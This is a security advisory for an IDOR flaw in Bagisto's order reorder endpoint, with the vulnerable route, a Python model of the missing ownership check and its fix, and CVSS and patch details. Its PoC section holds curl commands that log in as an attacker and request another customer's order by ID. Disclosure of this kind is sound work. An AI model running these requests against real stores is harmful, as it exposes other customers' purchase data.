CVE

GHSA-x5rw-qvvp-5cgm

Bagisto has IDOR in Customer Order Reorder Functionality

Summary

An Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud.

Details

The vulnerability exists in the reorder method within OrderController.php. Unlike the other order-related functions (view, cancel, printInvoice), which validate that the order belongs to the authenticated customer before acting on it, the reorder function retrieves the order by its ID alone and never checks ownership.

Code location: packages/Webkul/Shop/src/Http/Controllers/Customer/Account/OrderController.php

Exposed Route: packages/Webkul/Shop/src/Routes/customer-routes.php

Route::get('reorder/{id}', 'reorder')->name('shop.customers.account.orders.reorder');
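To make the missing check concrete, here is an added, constructed Python model of the reorder flow (not Bagisto's code, which is PHP): a repository with an unscoped find() beside an ownership-scoped find_for_customer(), and the "before" and "after" reorder handlers built on each. The Order, Customer and OrderRepository names and the sample data are hypothetical.

```python
"""Ownership-scoped object lookup, the pattern that closes an IDOR of the
kind described above.  Constructed example; names and data are hypothetical."""
from dataclasses import dataclass, field


@dataclass
class Order:
    id: int
    customer_id: int
    items: list


@dataclass
class Customer:
    id: int
    cart: list = field(default_factory=list)


class NotFound(Exception):
    """Maps to an HTTP 404 in the web layer."""


class OrderRepository:
    def __init__(self, orders):
        self._orders = {o.id: o for o in orders}

    def find(self, order_id):
        """Unscoped lookup: any caller who knows an id gets the row."""
        order = self._orders.get(order_id)
        if order is None:
            raise NotFound(order_id)
        return order

    def find_for_customer(self, order_id, customer_id):
        """Scoped lookup: the owner is part of the predicate, so a foreign
        order is indistinguishable from a nonexistent one (404, not 403)."""
        order = self._orders.get(order_id)
        if order is None or order.customer_id != customer_id:
            raise NotFound(order_id)
        return order


def reorder_vulnerable(repo, current_customer, order_id):
    """Before: fetch by id only, then copy the items into the caller's cart."""
    try:
        order = repo.find(order_id)
    except NotFound:
        return 404
    current_customer.cart.extend(order.items)
    return 302  # redirect to the cart


def reorder_fixed(repo, current_customer, order_id):
    """After: fetch by (id, authenticated owner); everything else is unchanged."""
    try:
        order = repo.find_for_customer(order_id, current_customer.id)
    except NotFound:
        return 404
    current_customer.cart.extend(order.items)
    return 302


def demo():
    """Run both handlers against constructed data and report what each did."""
    repo = OrderRepository([Order(id=1, customer_id=100, items=["sku-A", "sku-B"])])
    owner = Customer(id=100)
    other = Customer(id=200)

    before = reorder_vulnerable(repo, other, 1)   # foreign order, unscoped
    leaked = list(other.cart)
    other.cart.clear()

    after_foreign = reorder_fixed(repo, other, 1)  # foreign order, scoped
    after_missing = reorder_fixed(repo, other, 99)  # nonexistent order
    after_own = reorder_fixed(repo, owner, 1)      # own order, scoped
    return {
        "before": before, "leaked": leaked,
        "after_foreign": after_foreign, "after_foreign_cart": list(other.cart),
        "after_missing": after_missing,
        "after_own": after_own, "own_cart": list(owner.cart),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The fixed handler returns the same 404 for a foreign order and for a nonexistent one, so the response does not confirm which order IDs exist; the only change from the vulnerable handler is that the owner is part of the lookup rather than a check bolted on afterwards.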

PoC

I. Create victim account and place an order.

II. Login as attacker.

III. Exploit the IDOR by navigating to: http://target.xxx/customer/account/orders/reorder/1

IV. Check http://target.xxx/checkout/cart and verify exploitation.

V. The victim's order items are now in the attacker's cart.

PoC via curl

curl -c cookies.txt -X POST "http://target.xxx/customer/login" -d "email=attacker@evil.com&password=123qwe"
curl -b cookies.txt "http://target.xxx/customer/account/orders/reorder/1"
curl -b cookies.txt "http://target/api/checkout/cart"

Impact

  • Information Disclosure: Attackers can discover what products other customers have purchased.
  • Potential Fraud: Attackers could use the disclosed purchase history for social engineering or targeted attacks.


CVSS

CVSS Version: 3.1
Severity: High
Base Score: 7.1
Score Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N


References

  • https://github.com/bagisto/bagisto/security/advisories/GHSA-x5rw-qvvp-5cgm
  • https://nvd.nist.gov/vuln/detail/CVE-2026-21447
  • https://github.com/bagisto/bagisto/commit/b2b1cf62577245d03a68532478cffbe321df74d3
  • https://github.com/bagisto/bagisto


Basic Information

Ecosystem
Base CVSS: 7.1
EPSS Probability: 0%
EPSS Percentile: 0%
Introduced Version: 0
Fix Available: 2.3.10
